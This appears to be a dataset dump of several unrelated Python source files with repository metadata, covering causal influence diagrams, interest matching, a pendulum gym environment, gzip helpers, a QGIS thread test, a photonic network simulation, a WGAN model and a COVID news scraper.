expected_utility = macid.expected_utility({}, agent=agent)
if math.isclose(expected_utility, max_utility, rel_tol=rel_tol):
optimal_policies.append(policy)
elif expected_utility > max_utility:
optimal_policies = [policy]
max_utility = expected_utility
return optimal_policies
def optimal_pure_decision_rules(self, decision: str) -> List[StochasticFunctionCPD]:
"""
Return a list of all optimal pure decision rules for a given decision
"""
return [policy[0] for policy in self.optimal_pure_policies([decision])]
def impute_random_decision(self, d: str) -> None:
"""Impute a random policy to the given decision node"""
try:
domain = self.model.domain[d]
except KeyError:
raise ValueError(f"can't figure out domain for {d}, did you forget to specify DecisionDomain?")
else:
self.model[d] = StochasticFunctionCPD(
d, lambda **pv: {outcome: 1 / len(domain) for outcome in domain}, self, domain, label="random_decision"
)
def impute_fully_mixed_policy_profile(self) -> None:
"""Impute a fully mixed policy profile - ie a random decision rule to all decision nodes"""
for d in self.decisions:
self.impute_random_decision(d)
def remove_all_decision_rules(self) -> None:
"""Remove the decision rules from all decisions in the (MA)CID"""
for d in self.decisions:
self.model[d] = self.model.domain[d]
def impute_optimal_decision(self, decision: str) -> None:
"""Impute an optimal policy to the given decision node"""
# self.add_cpds(random.choice(self.optimal_pure_decision_rules(d)))
self.impute_random_decision(decision)
domain = self.model.domain[decision]
utility_nodes = self.agent_utilities[self.decision_agent[decision]]
descendant_utility_nodes = list(set(utility_nodes).intersection(nx.descendants(self, decision)))
copy = self.copy() # using a copy "freezes" the policy so it doesn't adapt to future interventions
@lru_cache(maxsize=1000)
def opt_policy(**parent_values: Outcome) -> Outcome:
eu = {}
for d in domain:
parent_values[decision] = d
eu[d] = sum(copy.expected_value(descendant_utility_nodes, parent_values))
return max(eu, key=eu.get) # type: ignore
self.add_cpds(StochasticFunctionCPD(decision, opt_policy, self, domain=domain, label="opt"))
def impute_conditional_expectation_decision(self, decision: str, y: str) -> None:
"""Imputes a policy for decision = the expectation of y conditioning on d's parents"""
# TODO: Move to analyze, as this is not really a core feature?
copy = self.copy()
@lru_cache(maxsize=1000)
def cond_exp_policy(**pv: Outcome) -> float:
if y in pv:
return pv[y] # type: ignore
else:
return copy.expected_value([y], pv)[0]
self.add_cpds(**{decision: cond_exp_policy})
# Wrapper around DAG.active_trail_nodes to accept arbitrary iterables for observed.
# Really, DAG.active_trail_nodes should accept Sets, especially since it does
# inefficient membership checks on observed as a list.
def active_trail_nodes(
self, variables: Union[str, List[str], Tuple[str, ...]], observed: Optional[Iterable[str]] = None, **kwargs: Any
) -> Dict[str, Set[str]]:
return super().active_trail_nodes(variables, list(observed), **kwargs) # type: ignore
def copy_without_cpds(self) -> MACIDBase:
"""copy the MACIDBase object without its CPDs"""
new = MACIDBase()
new.add_nodes_from(self.nodes)
new.add_edges_from(self.edges)
for agent in self.agents:
for decision in self.agent_decisions[agent]:
new.make_decision(decision, agent)
for utility in self.agent_utilities[agent]:
new.make_utility(utility, agent)
return new
def _get_color(self, node: str) -> Union[np.ndarray, str]:
"""
Assign a unique colour to each new agent's decision and utility nodes
"""
agents = list(self.agents)
colors = cm.rainbow(np.linspace(0, 1, len(agents)))
try:
agent = self.decision_agent[node]
except KeyError:
try:
agent = self.utility_agent[node]
except KeyError:
agent = None
if agent is not None:
color: np.ndarray = colors[[agents.index(agent)]]
return color
else:
return "lightgray" # chance node
def _get_shape(self, node: str) -> str:
if node in self.decisions:
return "s"
elif node in self.utilities:
return "D"
else:
return "o"
class MechanismGraph(MACIDBase):
"""A mechanism graph has an extra parent node+"mec" for each node"""
def __init__(self, cid: MACIDBase):
super().__init__(
edges=cid.edges(),
agent_decisions=cid.agent_decisions,
agent_utilities=cid.agent_utilities,
)
for node in cid.nodes:
if node[:-3] == "mec":
raise ValueError("can't create a mechanism graph when node {node} already ends with mec")
self.add_node(node + "mec")
self.add_edge(node + "mec", node)
# TODO: adapt the parameterization from cid as well
| 2,324 | 20 | 290 |
9383b5407c491e2906f208dceed512e4e2254eca | 3,150 | py | Python | backEnd/interestsProfile/views.py | arnavn101/Coterie | b4478f0e3cc799ce40f95a3711e0cdf18809a3e4 | [
"MIT"
] | null | null | null | backEnd/interestsProfile/views.py | arnavn101/Coterie | b4478f0e3cc799ce40f95a3711e0cdf18809a3e4 | [
"MIT"
] | null | null | null | backEnd/interestsProfile/views.py | arnavn101/Coterie | b4478f0e3cc799ce40f95a3711e0cdf18809a3e4 | [
"MIT"
] | 1 | 2021-11-07T12:57:53.000Z | 2021-11-07T12:57:53.000Z | from authUser.models import CustomAccount
from interestsProfile.models import InterestProfile, AlgoIDToUserID
from interestsProfile.matching_algo import MatchingAlgo
from profileUser.interests_list import length
| 47.014925 | 99 | 0.727937 | from authUser.models import CustomAccount
from interestsProfile.models import InterestProfile, AlgoIDToUserID
from interestsProfile.matching_algo import MatchingAlgo
from profileUser.interests_list import length
class InterestProfileManager:
def __init__(self, user_object: CustomAccount):
self.user_object = user_object
self.user_interests_profile, _ = InterestProfile.objects.get_or_create(user_id=user_object)
def initialize_interests(self, list_user_interests):
success = True
for individual_interest in list_user_interests:
if individual_interest not in self.user_interests_profile.dict_interests_weights:
success = False
continue
self.user_interests_profile.dict_interests_weights[individual_interest] = 1
self.user_interests_profile.save(update_fields=['dict_interests_weights'])
algo = MatchingAlgo(length)
algo.add_vector_workflow(list(self.user_interests_profile.dict_interests_weights.values()))
record = AlgoIDToUserID.objects.get_or_create()[0]
record.mapping[algo.length()-1] = self.user_object.id
record.save()
return success
def update_interests(self, new_list_interests):
list_current_interests = set(self.user_interests_profile.dict_interests_weights.keys())
new_interests = set(new_list_interests)
to_reset = list(list_current_interests.difference(new_interests))
success = True
for individual_key in to_reset:
self.user_interests_profile.dict_interests_weights[individual_key] = 0
for individual_interest in new_list_interests:
if individual_interest not in self.user_interests_profile.dict_interests_weights:
success = False
continue
currentVal = self.user_interests_profile.dict_interests_weights[individual_interest]
if currentVal == 0:
self.user_interests_profile.dict_interests_weights[individual_interest] = 1
self.user_interests_profile.save(update_fields=['dict_interests_weights'])
self.rebuild_algo()
return success
def increase_interest(self, interest_input, increment_amt):
self.user_interests_profile.dict_interests_weights[interest_input] += increment_amt
self.user_interests_profile.save(update_fields=['dict_interests_weights'])
self.rebuild_algo()
def decrease_interest(self, interest_input, decrement_amt):
self.user_interests_profile.dict_interests_weights[interest_input] -= decrement_amt
self.user_interests_profile.save(update_fields=['dict_interests_weights'])
self.rebuild_algo()
def rebuild_algo(self):
all_interest_profiles = InterestProfile.objects.all()
algo = MatchingAlgo(length)
record = AlgoIDToUserID.objects.get()
record.mapping = {}
for i_profile in all_interest_profiles:
algo.add_vector(list(i_profile.dict_interests_weights.values()))
record.mapping[algo.length()-1] = i_profile.id
record.save()
algo.serialize_index()
| 2,745 | 8 | 184 |
803f5959d4df3a3d844d51a6d88f8fc784c9b598 | 3,738 | py | Python | gym_brt/envs/qube_swingup_env.py | bjoseru/quanser-openai-driver | 1fcac7289bbeb140ae034f661b86d405f027f262 | [
"MIT"
] | 10 | 2018-08-02T20:01:13.000Z | 2021-09-07T18:09:20.000Z | gym_brt/envs/qube_swingup_env.py | bjoseru/quanser-openai-driver | 1fcac7289bbeb140ae034f661b86d405f027f262 | [
"MIT"
] | 4 | 2019-05-20T18:38:34.000Z | 2022-01-24T19:49:42.000Z | gym_brt/envs/qube_swingup_env.py | bjoseru/quanser-openai-driver | 1fcac7289bbeb140ae034f661b86d405f027f262 | [
"MIT"
] | 12 | 2019-04-09T03:56:50.000Z | 2022-02-02T19:01:31.000Z | from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import numpy as np
from gym import spaces
from gym_brt.envs.qube_base_env import QubeBaseEnv
"""
Description:
A pendulum is attached to an un-actuated joint to a horizontal arm,
which is actuated by a rotary motor. The pendulum begins
downwards and the goal is flip the pendulum up and then to keep it from
falling by applying a voltage on the motor which causes a torque on the
horizontal arm.
Source:
This is modified for the Quanser Qube Servo2-USB from the Cart Pole
problem described by Barto, Sutton, and Anderson, and implemented in
OpenAI Gym: https://github.com/openai/gym/blob/master/gym/envs/classic_control/cartpole.py
This description is also modified from the description by the OpenAI
team.
Observation:
Type: Box(4)
Num Observation Min Max
0 Rotary arm angle (theta) -90 deg 90 deg
1 Pendulum angle (alpha) -180 deg 180 deg
2 Cart Velocity -Inf Inf
3 Pole Velocity -Inf Inf
Note: the velocities are limited by the physical system.
Actions:
Type: Real number (1-D Continuous) (voltage applied to motor)
Reward:
r(s_t, a_t) = 1 - (0.8 * abs(alpha) + 0.2 * abs(theta)) / pi
Starting State:
Theta = 0 + noise, alpha = pi + noise
Episode Termination:
When theta is greater than ±90° or after 2048 steps
"""
| 33.375 | 98 | 0.599251 | from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import numpy as np
from gym import spaces
from gym_brt.envs.qube_base_env import QubeBaseEnv
"""
Description:
A pendulum is attached to an un-actuated joint to a horizontal arm,
which is actuated by a rotary motor. The pendulum begins
downwards and the goal is flip the pendulum up and then to keep it from
falling by applying a voltage on the motor which causes a torque on the
horizontal arm.
Source:
This is modified for the Quanser Qube Servo2-USB from the Cart Pole
problem described by Barto, Sutton, and Anderson, and implemented in
OpenAI Gym: https://github.com/openai/gym/blob/master/gym/envs/classic_control/cartpole.py
This description is also modified from the description by the OpenAI
team.
Observation:
Type: Box(4)
Num Observation Min Max
0 Rotary arm angle (theta) -90 deg 90 deg
1 Pendulum angle (alpha) -180 deg 180 deg
2 Cart Velocity -Inf Inf
3 Pole Velocity -Inf Inf
Note: the velocities are limited by the physical system.
Actions:
Type: Real number (1-D Continuous) (voltage applied to motor)
Reward:
r(s_t, a_t) = 1 - (0.8 * abs(alpha) + 0.2 * abs(theta)) / pi
Starting State:
Theta = 0 + noise, alpha = pi + noise
Episode Termination:
When theta is greater than ±90° or after 2048 steps
"""
class QubeSwingupEnv(QubeBaseEnv):
def _reward(self):
reward = 1 - (
(0.8 * np.abs(self._alpha) + 0.2 * np.abs(self._target_angle - self._theta))
/ np.pi
)
return max(reward, 0) # Clip for the follow env case
def _isdone(self):
done = False
done |= self._episode_steps >= self._max_episode_steps
done |= abs(self._theta) > (90 * np.pi / 180)
return done
def reset(self):
super(QubeSwingupEnv, self).reset()
state = self._reset_down()
return state
class QubeSwingupSparseEnv(QubeSwingupEnv):
def _reward(self):
within_range = True
within_range &= np.abs(self._alpha) < (1 * np.pi / 180)
within_range &= np.abs(self._theta) < (1 * np.pi / 180)
return 1 if within_range else 0
class QubeSwingupFollowEnv(QubeSwingupEnv):
def __init__(self, **kwargs):
super(QubeSwingupFollowEnv, self).__init__(**kwargs)
obs_max = np.asarray(
[np.pi / 2, np.pi, np.inf, np.inf, 80 * (np.pi / 180)], dtype=np.float64
)
self.observation_space = spaces.Box(-obs_max, obs_max)
def _get_state(self):
state = np.array(
[
self._theta,
self._alpha,
self._theta_dot,
self._alpha_dot,
self._target_angle,
],
dtype=np.float64,
)
return state
def _next_target_angle(self):
# Update the target angle twice a second on average at random intervals
if np.random.randint(1, self._frequency / 2) == 1:
max_angle = 80 * (np.pi / 180) # 80 degrees
angle = np.random.uniform(-max_angle, max_angle)
else:
angle = self._target_angle
return angle
class QubeSwingupFollowSparseEnv(QubeSwingupFollowEnv):
def _reward(self):
within_range = True
within_range &= np.abs(self._alpha) < (1 * np.pi / 180)
within_range &= np.abs(self._theta) < (1 * np.pi / 180)
return 1 if within_range else 0
| 1,709 | 91 | 304 |
be4b0872f71e5df9568ca4862fab6509d237b0e8 | 835 | py | Python | CossioUtils/io.py | cossio/CossioUtils | 0bf5dbfbcdd67fd1a6cbe99d5679e420055c590a | [
"MIT"
] | 1 | 2019-04-07T23:36:44.000Z | 2019-04-07T23:36:44.000Z | CossioUtils/io.py | cossio/CossioUtils | 0bf5dbfbcdd67fd1a6cbe99d5679e420055c590a | [
"MIT"
] | null | null | null | CossioUtils/io.py | cossio/CossioUtils | 0bf5dbfbcdd67fd1a6cbe99d5679e420055c590a | [
"MIT"
] | null | null | null | """
Input/output with the CHO_K1 model files.
"""
import os
import subprocess
def gunzip(path, keep=True):
"""
Check if file is gzipped, in which case extract it (replacing output).
Returns original path.
"""
if os.path.exists(path + '.gz'):
if keep:
subprocess.call(['gunzip', '--force', '--keep', path + '.gz'])
else:
subprocess.call(['gunzip', '--force', path + '.gz'])
elif not os.path.exists(path):
raise FileNotFoundError
return path
def gzip(path, keep=True):
"Compress file (replacing output)."
if os.path.exists(path):
if keep:
subprocess.call(['gzip', '--force', '--keep', path])
else:
subprocess.call(['gzip', '--force', path])
else:
raise FileNotFoundError
return path
| 24.558824 | 75 | 0.565269 | """
Input/output with the CHO_K1 model files.
"""
import os
import subprocess
def gunzip(path, keep=True):
"""
Check if file is gzipped, in which case extract it (replacing output).
Returns original path.
"""
if os.path.exists(path + '.gz'):
if keep:
subprocess.call(['gunzip', '--force', '--keep', path + '.gz'])
else:
subprocess.call(['gunzip', '--force', path + '.gz'])
elif not os.path.exists(path):
raise FileNotFoundError
return path
def gzip(path, keep=True):
"Compress file (replacing output)."
if os.path.exists(path):
if keep:
subprocess.call(['gzip', '--force', '--keep', path])
else:
subprocess.call(['gzip', '--force', path])
else:
raise FileNotFoundError
return path
| 0 | 0 | 0 |
feb907e46ae267e25885459ab49489e5ba766bf5 | 2,834 | py | Python | tests/integration/thread_support/test_run.py | pyqgis/plutil | 79df2596e4e0340f3765ccb5bdfd4cc1d01fcb7d | [
"MIT"
] | null | null | null | tests/integration/thread_support/test_run.py | pyqgis/plutil | 79df2596e4e0340f3765ccb5bdfd4cc1d01fcb7d | [
"MIT"
] | null | null | null | tests/integration/thread_support/test_run.py | pyqgis/plutil | 79df2596e4e0340f3765ccb5bdfd4cc1d01fcb7d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
"""
from __future__ import unicode_literals
from __future__ import print_function
import logging
import threading
from time import sleep
from unittest import TestCase, SkipTest
from unittest.mock import MagicMock
from PyQt5.QtCore import QCoreApplication, QEventLoop
from qgis_plutil.thread_support.gui_side import GuiSide
from qgis_plutil.thread_support.messages.base import TsMessage
from qgis_plutil.thread_support.thread_side import ThreadSide
logger = logging.getLogger('tests.plutil.thread_support')
| 32.204545 | 80 | 0.680663 | # -*- coding: utf-8 -*-
"""
"""
from __future__ import unicode_literals
from __future__ import print_function
import logging
import threading
from time import sleep
from unittest import TestCase, SkipTest
from unittest.mock import MagicMock
from PyQt5.QtCore import QCoreApplication, QEventLoop
from qgis_plutil.thread_support.gui_side import GuiSide
from qgis_plutil.thread_support.messages.base import TsMessage
from qgis_plutil.thread_support.thread_side import ThreadSide
logger = logging.getLogger('tests.plutil.thread_support')
class WorkerThread(ThreadSide, threading.Thread):
def __init__(self, *args, **kwargs):
super(WorkerThread, self).__init__(name="WorkerThread", *args, **kwargs)
# Set this to terminate the thread.
self.stop = threading.Event()
def run(self):
self.thread_side_started()
while not self.stop.is_set():
pass
class AMessage(TsMessage):
def __init__(self, *args, **kwargs):
super(AMessage, self).__init__(*args, **kwargs)
self.on_thread_side_called = 0
self.on_on_gui_side = 0
def on_thread_side(self):
""" Executed just before the messages leaves the thread side. """
self.on_thread_side_called = self.on_thread_side_called + 1
def on_gui_side(self):
""" Executed when the message has reached GUI side. """
self.on_on_gui_side = self.on_on_gui_side + 1
class TestTestee(TestCase):
def setUp(self):
self.plugin = MagicMock()
self.app = QCoreApplication([])
self.thread = WorkerThread(self.plugin)
self.testee = GuiSide()
self.testee.tie(self.thread)
self.thread.start()
sleep(0.5)
self.testee.receiver()
def tearDown(self):
self.thread.stop.set()
self.testee = None
self.app.exit()
def test_init(self):
logger.debug("Run GuiSide/ThreadSide test starting")
self.app.processEvents(QEventLoop.AllEvents, 1)
sleep(0.2)
self.assertEqual(self.thread.state, self.thread.STATE_CONNECTED)
msg = AMessage(self.plugin, self.thread)
self.assertIsNotNone(msg.message_id)
self.thread.send_to_gui(msg)
sleep(0.2)
self.testee.receiver()
self.app.processEvents(QEventLoop.AllEvents, 1)
self.assertEqual(msg.on_thread_side_called, 1)
self.assertEqual(msg.on_thread_side_called, 1)
msg = AMessage(self.plugin, self.thread)
self.assertIsNotNone(msg.message_id)
self.thread.send_to_gui(msg)
sleep(0.2)
self.testee.receiver()
self.app.processEvents(QEventLoop.AllEvents, 1)
self.assertEqual(msg.on_thread_side_called, 1)
self.assertEqual(msg.on_thread_side_called, 1)
logger.debug("Run GuiSide/ThreadSide test ends")
| 1,707 | 384 | 202 |
122e24f97103d87047596f69b219cb89b9aa8ea0 | 3,296 | py | Python | examples/recurrentwithtestbench.py | Bhaskers-Blu-Org1/complex-linear-network-analyzer | b336a4fca1222a4f284bb39c6c3e6bec402f5efa | [
"Apache-2.0"
] | 6 | 2020-01-20T10:22:49.000Z | 2020-04-24T06:53:51.000Z | examples/recurrentwithtestbench.py | Bhaskers-Blu-Org1/complex-linear-network-analyzer | b336a4fca1222a4f284bb39c6c3e6bec402f5efa | [
"Apache-2.0"
] | 7 | 2020-01-28T18:59:00.000Z | 2020-02-24T14:42:07.000Z | examples/recurrentwithtestbench.py | IBM/complex-linear-network-analyzer | b336a4fca1222a4f284bb39c6c3e6bec402f5efa | [
"Apache-2.0"
] | 5 | 2020-01-29T04:05:49.000Z | 2020-06-29T15:05:15.000Z | # +-----------------------------------------------------------------------------+
# | Copyright 2019-2020 IBM Corp. All Rights Reserved. |
# | |
# | Licensed under the Apache License, Version 2.0 (the "License"); |
# | you may not use this file except in compliance with the License. |
# | You may obtain a copy of the License at |
# | |
# | http://www.apache.org/licenses/LICENSE-2.0 |
# | |
# | Unless required by applicable law or agreed to in writing, software |
# | distributed under the License is distributed on an "AS IS" BASIS, |
# | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. |
# | See the License for the specific language governing permissions and |
# | limitations under the License. |
# +-----------------------------------------------------------------------------+
# | Authors: Lorenz K. Mueller, Pascal Stark |
# +-----------------------------------------------------------------------------+
""" Creates a very simple recurrent network with a testbench.
This is the example used in the basic usage guide.
The network topology is as follows:
A -> B
^ v
D <- C
A testbench is used to inject time varying signals at node A and B.
"""
from colna.analyticnetwork import Network, Edge, Testbench
import numpy as np
import matplotlib.pyplot as plt
### Create the Network and add the nodes
net = Network()
net.add_node(name='a')
net.add_node(name='b')
net.add_node(name='c')
net.add_node(name='d')
net.add_edge(Edge(start='a',end='b',phase=1,attenuation=0.8,delay=1))
net.add_edge(Edge(start='b',end='c',phase=2,attenuation=0.7,delay=2))
net.add_edge(Edge(start='c',end='d',phase=3,attenuation=0.8,delay=1))
net.add_edge(Edge(start='d',end='a',phase=-1,attenuation=0.9,delay=0.5))
net.visualize(path='./visualizations/recurrent_with_testbench')
### Create a testbench
tb = Testbench(network=net, timestep=0.1) # Timestep should be factor of all delays
x_in_a = np.sin(np.linspace(0,15,500))+1.5 # create the input signal (Dimensino N)
t_in = np.linspace(0, 10, num=501) # create the input time vector (Dimension N+1)
tb.add_input_sequence(node_name='a',x=x_in_a,t=t_in)
# add output nodes to testbench (nodes at which output signal should be recorded)
tb.add_output_node('c')
tb.add_output_node('d')
# evaluate the network (through the testbench)
tb.evaluate_network(amplitude_cutoff=1e-6)
# Calculate the output signal at the output nodes
tb.calculate_output(n_threads=8) # uses multithreading with at most 8 threads
t, x = tb.t_out.transpose(), tb.x_out.transpose()
### Plot the signals
plt.plot(tb.input_t[0][:-1], np.abs(tb.input_x[0][:-1]), 'o') # Input signal
plt.plot(t, np.abs(x), 'x') # Output signal
plt.xlabel('Time')
plt.ylabel('|x|')
plt.legend(['Input', 'Output C', 'Output D'], loc='lower left')
plt.grid()
# plt.savefig('basic_feedforward_tb_output.svg')
plt.show()
| 41.721519 | 83 | 0.567658 | # +-----------------------------------------------------------------------------+
# | Copyright 2019-2020 IBM Corp. All Rights Reserved. |
# | |
# | Licensed under the Apache License, Version 2.0 (the "License"); |
# | you may not use this file except in compliance with the License. |
# | You may obtain a copy of the License at |
# | |
# | http://www.apache.org/licenses/LICENSE-2.0 |
# | |
# | Unless required by applicable law or agreed to in writing, software |
# | distributed under the License is distributed on an "AS IS" BASIS, |
# | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. |
# | See the License for the specific language governing permissions and |
# | limitations under the License. |
# +-----------------------------------------------------------------------------+
# | Authors: Lorenz K. Mueller, Pascal Stark |
# +-----------------------------------------------------------------------------+
""" Creates a very simple recurrent network with a testbench.
This is the example used in the basic usage guide.
The network topology is as follows:
A -> B
^ v
D <- C
A testbench is used to inject time varying signals at node A and B.
"""
from colna.analyticnetwork import Network, Edge, Testbench
import numpy as np
import matplotlib.pyplot as plt
### Create the Network and add the nodes
net = Network()
net.add_node(name='a')
net.add_node(name='b')
net.add_node(name='c')
net.add_node(name='d')
net.add_edge(Edge(start='a',end='b',phase=1,attenuation=0.8,delay=1))
net.add_edge(Edge(start='b',end='c',phase=2,attenuation=0.7,delay=2))
net.add_edge(Edge(start='c',end='d',phase=3,attenuation=0.8,delay=1))
net.add_edge(Edge(start='d',end='a',phase=-1,attenuation=0.9,delay=0.5))
net.visualize(path='./visualizations/recurrent_with_testbench')
### Create a testbench
tb = Testbench(network=net, timestep=0.1) # Timestep should be factor of all delays
x_in_a = np.sin(np.linspace(0,15,500))+1.5 # create the input signal (Dimensino N)
t_in = np.linspace(0, 10, num=501) # create the input time vector (Dimension N+1)
tb.add_input_sequence(node_name='a',x=x_in_a,t=t_in)
# add output nodes to testbench (nodes at which output signal should be recorded)
tb.add_output_node('c')
tb.add_output_node('d')
# evaluate the network (through the testbench)
tb.evaluate_network(amplitude_cutoff=1e-6)
# Calculate the output signal at the output nodes
tb.calculate_output(n_threads=8) # uses multithreading with at most 8 threads
t, x = tb.t_out.transpose(), tb.x_out.transpose()
### Plot the signals
plt.plot(tb.input_t[0][:-1], np.abs(tb.input_x[0][:-1]), 'o') # Input signal
plt.plot(t, np.abs(x), 'x') # Output signal
plt.xlabel('Time')
plt.ylabel('|x|')
plt.legend(['Input', 'Output C', 'Output D'], loc='lower left')
plt.grid()
# plt.savefig('basic_feedforward_tb_output.svg')
plt.show()
| 0 | 0 | 0 |
990c196f5e7a804c80194cfa856bf71876334ed4 | 83 | py | Python | wrktoolbox/results/importers/__init__.py | kishorekumar-kk/wrktoolbox | 20ba73a6dc04c4c1436ed6e3d37095246b3c7392 | [
"MIT"
] | 3 | 2020-04-08T08:54:26.000Z | 2021-07-27T16:29:39.000Z | wrktoolbox/results/importers/__init__.py | kishorekumar-kk/wrktoolbox | 20ba73a6dc04c4c1436ed6e3d37095246b3c7392 | [
"MIT"
] | 2 | 2019-07-08T13:19:41.000Z | 2021-01-24T21:06:06.000Z | wrktoolbox/results/importers/__init__.py | kishorekumar-kk/wrktoolbox | 20ba73a6dc04c4c1436ed6e3d37095246b3c7392 | [
"MIT"
] | 2 | 2020-11-03T07:54:53.000Z | 2021-01-22T11:59:05.000Z | from .fs import FileSystemResultsImporter, BinResultsImporter, JsonResultsImporter
| 41.5 | 82 | 0.891566 | from .fs import FileSystemResultsImporter, BinResultsImporter, JsonResultsImporter
| 0 | 0 | 0 |
b903f800d1282748870cd47b182ead99beff34b4 | 5,558 | py | Python | awesome_gans/wgan/model.py | StevenJokess/Awesome-GANs | b78410e072ec3c0c39a4dac853dea7c219817c65 | [
"MIT"
] | 739 | 2017-05-28T18:07:38.000Z | 2022-03-28T23:57:42.000Z | awesome_gans/wgan/model.py | StevenJokess/Awesome-GANs | b78410e072ec3c0c39a4dac853dea7c219817c65 | [
"MIT"
] | 25 | 2018-01-18T07:09:07.000Z | 2021-08-25T14:11:09.000Z | awesome_gans/wgan/model.py | StevenJokess/Awesome-GANs | b78410e072ec3c0c39a4dac853dea7c219817c65 | [
"MIT"
] | 185 | 2017-07-15T05:18:10.000Z | 2022-02-17T10:17:02.000Z | import os
import tensorflow as tf
from tensorflow.keras.layers import (
BatchNormalization,
Conv2D,
Conv2DTranspose,
Dense,
Flatten,
Input,
Layer,
LeakyReLU,
ReLU,
Reshape,
)
from tensorflow.keras.models import Model
from tqdm import tqdm
from awesome_gans.losses import discriminator_loss, generator_loss, discriminator_wgan_loss, generator_wgan_loss
from awesome_gans.optimizers import build_optimizer
from awesome_gans.utils import merge_images, save_image
| 34.308642 | 112 | 0.622526 | import os
import tensorflow as tf
from tensorflow.keras.layers import (
BatchNormalization,
Conv2D,
Conv2DTranspose,
Dense,
Flatten,
Input,
Layer,
LeakyReLU,
ReLU,
Reshape,
)
from tensorflow.keras.models import Model
from tqdm import tqdm
from awesome_gans.losses import discriminator_loss, generator_loss, discriminator_wgan_loss, generator_wgan_loss
from awesome_gans.optimizers import build_optimizer
from awesome_gans.utils import merge_images, save_image
class WGAN:
def __init__(self, config):
self.config = config
self.bs: int = self.config.bs
self.n_samples: int = self.config.n_samples
self.epochs: int = self.config.epochs
self.d_loss = self.config.d_loss
self.g_loss = self.config.g_loss
self.n_feats: int = self.config.n_feats
self.width: int = self.config.width
self.height: int = self.config.height
self.n_channels: int = self.config.n_channels
self.z_dims: int = self.config.z_dims
self.n_critics: int = self.config.n_critics
self.grad_clip: float = self.config.grad_clip
self.model_path: str = self.config.model_path
self.output_path: str = self.config.output_path
self.verbose: bool = self.config.verbose
self.discriminator: tf.keras.Model = self.build_discriminator()
self.generator: tf.keras.Model = self.build_generator()
self.d_opt: tf.keras.optimizers = build_optimizer(config, config.d_opt)
self.g_opt: tf.keras.optimizers = build_optimizer(config, config.g_opt)
self.checkpoint = tf.train.Checkpoint(
discriminator=self.discriminator,
discriminator_optimzer=self.d_opt,
generator=self.generator,
generator_optimizer=self.g_opt,
)
if self.verbose:
self.discriminator.summary()
self.generator.summary()
def build_discriminator(self) -> tf.keras.Model:
inputs = Input((self.width, self.height, self.n_channels))
x = Conv2D(self.n_feats, kernel_size=5, strides=2, padding='same')(inputs)
x = LeakyReLU(alpha=0.2)(x)
for i in range(3):
x = Conv2D(self.n_feats * (2 ** (i + 1)), kernel_size=5, strides=2, padding='same')(x)
x = BatchNormalization()(x)
x = LeakyReLU(alpha=0.2)(x)
x = Flatten()(x)
x = Dense(1)(x)
return Model(inputs, x, name='discriminator')
def build_generator(self) -> tf.keras.Model:
inputs = Input((self.z_dims,))
x = Dense(4 * 4 * 4 * self.z_dims)(inputs)
x = BatchNormalization()(x)
x = ReLU()(x)
x = Reshape((4, 4, 4 * self.z_dims))(x)
for i in range(3):
x = Conv2DTranspose(self.z_dims * 4 // (2 ** i), kernel_size=5, strides=2, padding='same')(x)
x = BatchNormalization()(x)
x = ReLU()(x)
x = Conv2DTranspose(self.n_channels, kernel_size=5, strides=1, padding='same')(x)
x = Layer('tanh')(x)
return Model(inputs, x, name='generator')
@tf.function
def train_discriminator(self, x: tf.Tensor):
z = tf.random.uniform((self.bs, self.z_dims))
with tf.GradientTape() as gt:
x_fake = self.generator(z, training=True)
d_fake = self.discriminator(x_fake, training=True)
d_real = self.discriminator(x, training=True)
d_loss = discriminator_wgan_loss(d_real, d_fake)
gradients = gt.gradient(d_loss, self.discriminator.trainable_variables)
self.d_opt.apply_gradients(zip(gradients, self.discriminator.trainable_variables))
for var in self.discriminator.trainable_variables:
var.assign(tf.clip_by_value(var, -self.grad_clip, self.grad_clip))
return d_loss
@tf.function
def train_generator(self):
z = tf.random.uniform((self.bs, self.z_dims))
with tf.GradientTape() as gt:
x_fake = self.generator(z, training=True)
d_fake = self.discriminator(x_fake, training=True)
g_loss = generator_wgan_loss(d_fake)
gradients = gt.gradient(g_loss, self.generator.trainable_variables)
self.g_opt.apply_gradients(zip(gradients, self.generator.trainable_variables))
return g_loss
def load(self) -> int:
return 0
def train(self, dataset: tf.data.Dataset):
start_epoch: int = self.load()
z_samples = tf.random.uniform((self.n_samples, self.z_dims))
for epoch in range(start_epoch, self.epochs):
loader = tqdm(dataset, desc=f'[*] Epoch {epoch} / {self.epochs}')
for n_iter, batch in enumerate(loader):
for _ in range(self.n_critics):
d_loss = self.train_discriminator(batch)
g_loss = self.train_generator()
loader.set_postfix(
d_loss=f'{d_loss:.5f}',
g_loss=f'{g_loss:.5f}',
)
# saving the generated samples
samples = self.generate_samples(z_samples)
samples = merge_images(samples, n_rows=int(self.n_samples ** 0.5))
save_image(samples, os.path.join(self.output_path, f'{epoch}.png'))
# saving the models & optimizers
self.checkpoint.save(file_prefix=os.path.join(self.model_path, f'{epoch}'))
@tf.function
def generate_samples(self, z: tf.Tensor):
return self.generator(z, training=False)
| 4,776 | 256 | 23 |
6b4d6d847ba58abac6e0ef39bfeb1d6a44cda852 | 1,002 | py | Python | src/utils/fetch_timeline.py | CS-UIT-AI-CLUB/covid-stat | 5e1ba8049cec2d0917e736cc1c52e082669407c7 | [
"MIT"
] | null | null | null | src/utils/fetch_timeline.py | CS-UIT-AI-CLUB/covid-stat | 5e1ba8049cec2d0917e736cc1c52e082669407c7 | [
"MIT"
] | null | null | null | src/utils/fetch_timeline.py | CS-UIT-AI-CLUB/covid-stat | 5e1ba8049cec2d0917e736cc1c52e082669407c7 | [
"MIT"
] | null | null | null | from bs4 import BeautifulSoup
import datetime
import unicodedata
def fetch_timeline(response):
'''
Fetch latest COVID-19 news.
Input: HTML content fetched from the web.
Return (
unix_timestamp,
list of paragraphs (unicode NFKC normalized)
)
'''
soup = BeautifulSoup(response, features="html.parser")
# Fetch latest news
timeline = soup.find("div", {"class": "timeline-detail"})
date = timeline.find("div", {"class": "timeline-head"}).text.strip()
content = timeline.find("div", {"class": "timeline-content"})
# Convert from string to datetime
date = datetime.datetime.strptime(date, '%H:%M %d/%m/%Y')
# Convert from UTF+7 to UTC+0
date = date - datetime.timedelta(hours=7)
timestamp = date.timestamp()
# Normalize content
content = unicodedata.normalize('NFKC', content.text).strip()
# Split lines
lines = content.splitlines()
